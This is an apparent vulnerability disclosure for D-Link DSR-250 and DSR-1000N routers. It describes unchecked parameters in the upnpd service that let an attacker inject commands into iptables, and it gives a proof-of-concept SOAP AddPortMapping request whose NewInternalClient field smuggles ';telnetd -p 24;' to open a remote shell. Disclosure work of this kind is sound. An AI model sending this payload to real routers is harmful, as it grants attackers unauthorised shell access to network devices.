WinMin/Disclosure of vulnerabilities in D-Link DSR-250 DSR-1000N router.md Secret

## Disclosure of vulnerabilities in D-Link DSR-250 DSR-1000N router.md

      
    Raw
  

              Disclosure of vulnerabilities in D-Link DSR-250 DSR-1000N router.md
            
          
    Version

DSR-250 (3.14) DSR-1000N (2.11B201)
Vulnerability details

There is a upnpd program in the firmware package, which listens on port 1900（udp）and 49152(tcp) at 0.0.0.0.

Through reverse analysis, we find that when the program sets iptable, the parameters are not checked, which may cause command injection.

Parameters such as '_newInternalClient' can be controlled and finally assembled into the iptables command. Because the special symbol is not checked, it may cause command injection.
PoC

POST /upnp/control/WANIPConn1 HTTP/1.1
HOST: $control_host:$control_port
Content-Length: $content_length
Content-Type: text/xml; charset="utf-8"
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <s:Body>
  <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
   <NewExternalPort>7331</NewExternalPort>
   <NewProtocol>tcp<NewProtocol/>
   <NewInternalPort>1337<NewInternalPort/>
   <NewLeaseDuration><NewLeaseDuration/>
   <NewEnabled>1<NewEnabled/>
   <NewPortMappingDescription>hackedByC0ss4ck<NewPortMappingDescription/>
   <NewRemoteHost>0.0.0.0<NewRemoteHost/>
   <NewInternalClient>;telnetd -p 24;<NewInternalClient/>
  </u:AddPortMapping>
 </s:Body>
</s:Envelope>

Founder

Swings @ Chaitin (email: weiming.shi@chaitin.com)

C0ss4c k@StarCross Tech